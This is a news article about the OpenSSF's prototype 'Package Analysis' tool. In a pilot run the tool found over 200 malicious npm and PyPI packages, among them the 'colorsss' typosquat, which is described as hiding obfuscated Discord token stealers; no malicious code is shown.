Connect with us

Hi, what are you looking for?

Cyber Security

Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages

The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative has released its first prototype version of the ‘Package Analysis’ tool that aims to catch and counter malicious attacks on open source registries.

In a pilot run that lasted less than a month, the open source project released on GitHub, was able to identify over 200 malicious npm and PyPI packages.

Project aims to combat malware in open source registries

This week, OpenSSF released its initial prototype version of the ‘Package Analysis‘ project on GitHub.

The project repository contains tools that analyze open source packages, particularly, to hunt for malicious npm and PyPI packages.

“The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?” explain Caleb Brown and David A. Wheeler, who are involved in  OpenSSF’s Securing Critical Projects working group.

“The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously.” 

In its test run that lasted under a month, Package Analysis was able to identify more than 200 malicious PyPI and npm components, according to OpenSSF.

The vast majority of these malicious packages, says OpenSSF, are dependency confusion and typosquatting attacks.

Among all malicious packages identified by Package Analysis, one of them is ‘colorsss’ that has been previously deemed malicious:

malicious npm typosquat colorsss
malicious npm typosquat ‘colorsss’ (BleepingComputer)

The ‘colorsss’ package is a typosquat of the popular colors npm library, select versions of which had been sabotaged by its developer this January, as first reported by BleepingComputer.

In addition to containing some legitimate files from the colors library, malicious ‘colorsss’ packs obfuscated malware, according to an archived copy of the package obtained by BleepingComputer from open source security firm Sonatype:

malware hidden inside colorsss
Obfuscated malware hidden inside ‘colorsss’ typosquat (BleepingComputer)

The obfuscated code in ‘colorsss’ contains Discord token stealers, a recurring theme among malicious npm packages.

“Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences,” states OpenSSF in a blog post released this week.

“There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of… detecting differences in package behavior over time; automating the processing of the Package Analysis results; storing the packages themselves as they are processed for long-term analysis; and improving the reliability of the pipeline.”

Full disclosure: I regularly attend OpenSSF group meetings as a member. The malicious typosquat, ‘colorsss’ mentioned in the piece had previously been analyzed by the Sonatype security research team, which includes me.

Source: https://www.bleepingcomputer.com/news/security/open-source-package-analysis-tool-finds-malicious-npm-pypi-packages/

Advertisement. Scroll to continue reading.
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

Telegram Messenger offers global, cloud-based instant messaging with several features:- Cybersecurity researchers at Securlist recently found several Telegram mods on Google Play in various...

Cyber Security

AttackCrypt, an open-source “crypter,” was recently used by cybercriminals to hide malware binaries and avoid antivirus detection. A crypter is a kind of software that can...

Cyber Security

We are glad to present the most recent news on cybersecurity in this week’s Threat and Vulnerability Roundup from Cyber Writes.  The latest attack...

Cyber Security

The cybercrime group evaded remediation efforts by installing persistent backdoors and deploying “new and novel malware.” A Chinese-linked hacking group that security researchers say...

Copyright © 2023 Newsworthy News | Global | Political | Local | All News | Website By: Top Search SEO